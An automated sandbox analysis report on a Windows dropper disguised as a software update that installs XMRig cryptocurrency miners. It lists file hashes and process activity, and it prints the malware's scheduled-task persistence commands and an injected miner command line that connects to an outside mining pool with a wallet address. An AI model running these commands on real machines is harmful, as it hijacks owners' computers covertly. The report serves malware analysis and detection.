Analysis
-
max time kernel
137s -
max time network
129s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
19-07-2021 00:03
Static task
static1
Behavioral task
behavioral1
Sample
Software updated v2.6.0.exe
Resource
win7v20210410
General
-
Target
Software updated v2.6.0.exe
-
Size
256KB
-
MD5
18d05e20731583a22b495d0d1f107c5b
-
SHA1
2ced0e3577063ca3613b43661e7df5bc1411ab09
-
SHA256
b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
-
SHA512
36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2112-166-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/2112-167-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/2112-169-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 6 IoCs
Processes:
xmrmine.exeetcmin.exertksmbs.exeserverpatch.exesihost64.exesihost32.exepid process 3860 xmrmine.exe 3928 etcmin.exe 3884 rtksmbs.exe 4028 serverpatch.exe 3472 sihost64.exe 3356 sihost32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
serverpatch.exedescription pid process target process PID 4028 set thread context of 2112 4028 serverpatch.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2688 schtasks.exe 3544 schtasks.exe 688 schtasks.exe 4076 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
etcmin.exexmrmine.exeserverpatch.exertksmbs.exepid process 3928 etcmin.exe 3860 xmrmine.exe 4028 serverpatch.exe 3884 rtksmbs.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
xmrmine.exeetcmin.exeserverpatch.exertksmbs.exeexplorer.exedescription pid process Token: SeDebugPrivilege 3860 xmrmine.exe Token: SeDebugPrivilege 3928 etcmin.exe Token: SeDebugPrivilege 4028 serverpatch.exe Token: SeDebugPrivilege 3884 rtksmbs.exe Token: SeLockMemoryPrivilege 2112 explorer.exe Token: SeLockMemoryPrivilege 2112 explorer.exe -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
Software updated v2.6.0.exexmrmine.exeetcmin.execmd.execmd.exeserverpatch.exertksmbs.execmd.execmd.exedescription pid process target process PID 992 wrote to memory of 3860 992 Software updated v2.6.0.exe xmrmine.exe PID 992 wrote to memory of 3860 992 Software updated v2.6.0.exe xmrmine.exe PID 992 wrote to memory of 3928 992 Software updated v2.6.0.exe etcmin.exe PID 992 wrote to memory of 3928 992 Software updated v2.6.0.exe etcmin.exe PID 3860 wrote to memory of 2052 3860 xmrmine.exe cmd.exe PID 3860 wrote to memory of 2052 3860 xmrmine.exe cmd.exe PID 3928 wrote to memory of 576 3928 etcmin.exe cmd.exe PID 3928 wrote to memory of 576 3928 etcmin.exe cmd.exe PID 2052 wrote to memory of 4076 2052 cmd.exe schtasks.exe PID 2052 wrote to memory of 4076 2052 cmd.exe schtasks.exe PID 576 wrote to memory of 2688 576 cmd.exe schtasks.exe PID 576 wrote to memory of 2688 576 cmd.exe schtasks.exe PID 3860 wrote to memory of 4028 3860 xmrmine.exe serverpatch.exe PID 3860 wrote to memory of 4028 3860 xmrmine.exe serverpatch.exe PID 3928 wrote to memory of 3884 3928 etcmin.exe rtksmbs.exe PID 3928 wrote to memory of 3884 3928 etcmin.exe rtksmbs.exe PID 4028 wrote to memory of 2164 4028 serverpatch.exe cmd.exe PID 4028 wrote to memory of 2164 4028 serverpatch.exe cmd.exe PID 3884 wrote to memory of 1532 3884 rtksmbs.exe cmd.exe PID 3884 wrote to memory of 1532 3884 rtksmbs.exe cmd.exe PID 4028 wrote to memory of 3472 4028 serverpatch.exe sihost64.exe PID 4028 wrote to memory of 3472 4028 serverpatch.exe sihost64.exe PID 3884 wrote to memory of 3356 3884 rtksmbs.exe sihost32.exe PID 3884 wrote to memory of 3356 3884 rtksmbs.exe sihost32.exe PID 2164 wrote to memory of 688 2164 cmd.exe schtasks.exe PID 2164 wrote to memory of 688 2164 cmd.exe schtasks.exe PID 1532 wrote to memory of 3544 1532 cmd.exe schtasks.exe PID 1532 wrote to memory of 3544 1532 cmd.exe schtasks.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe PID 4028 wrote to memory of 2112 4028 serverpatch.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\serverpatch.exe"C:\Users\Admin\appdata\roaming\serverpatch.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\rtksmbs.exe"C:\Users\Admin\appdata\roaming\rtksmbs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\appdata\roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\appdata\roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
memory/576-129-0x0000000000000000-mapping.dmp
-
memory/688-164-0x0000000000000000-mapping.dmp
-
memory/1532-149-0x0000000000000000-mapping.dmp
-
memory/2052-128-0x0000000000000000-mapping.dmp
-
memory/2112-173-0x0000000014C40000-0x0000000014C60000-memory.dmpFilesize
128KB
-
memory/2112-172-0x0000000014790000-0x00000000147B0000-memory.dmpFilesize
128KB
-
memory/2112-169-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2112-168-0x0000000001340000-0x0000000001360000-memory.dmpFilesize
128KB
-
memory/2112-167-0x00000001402EB66C-mapping.dmp
-
memory/2112-166-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2112-174-0x00000000149B0000-0x00000000149D0000-memory.dmpFilesize
128KB
-
memory/2112-175-0x00000000149D0000-0x00000000149F0000-memory.dmpFilesize
128KB
-
memory/2164-148-0x0000000000000000-mapping.dmp
-
memory/2688-131-0x0000000000000000-mapping.dmp
-
memory/3356-151-0x0000000000000000-mapping.dmp
-
memory/3356-163-0x000000001BA60000-0x000000001BA62000-memory.dmpFilesize
8KB
-
memory/3356-158-0x0000000000030000-0x0000000000031000-memory.dmpFilesize
4KB
-
memory/3472-162-0x000000001C310000-0x000000001C312000-memory.dmpFilesize
8KB
-
memory/3472-150-0x0000000000000000-mapping.dmp
-
memory/3472-154-0x00000000006F0000-0x00000000006F1000-memory.dmpFilesize
4KB
-
memory/3544-165-0x0000000000000000-mapping.dmp
-
memory/3860-118-0x0000000000080000-0x0000000000081000-memory.dmpFilesize
4KB
-
memory/3860-132-0x000000001C350000-0x000000001C352000-memory.dmpFilesize
8KB
-
memory/3860-125-0x00000000009A0000-0x00000000009A9000-memory.dmpFilesize
36KB
-
memory/3860-114-0x0000000000000000-mapping.dmp
-
memory/3884-160-0x000000001C4B0000-0x000000001C4B2000-memory.dmpFilesize
8KB
-
memory/3884-135-0x0000000000000000-mapping.dmp
-
memory/3928-126-0x00000000011A0000-0x00000000011A1000-memory.dmpFilesize
4KB
-
memory/3928-124-0x00000000010E0000-0x00000000010E6000-memory.dmpFilesize
24KB
-
memory/3928-122-0x00000000007C0000-0x00000000007C1000-memory.dmpFilesize
4KB
-
memory/3928-117-0x0000000000000000-mapping.dmp
-
memory/3928-133-0x00000000011D0000-0x00000000011D2000-memory.dmpFilesize
8KB
-
memory/4028-134-0x0000000000000000-mapping.dmp
-
memory/4028-161-0x000000001D3A0000-0x000000001D3A2000-memory.dmpFilesize
8KB
-
memory/4076-130-0x0000000000000000-mapping.dmp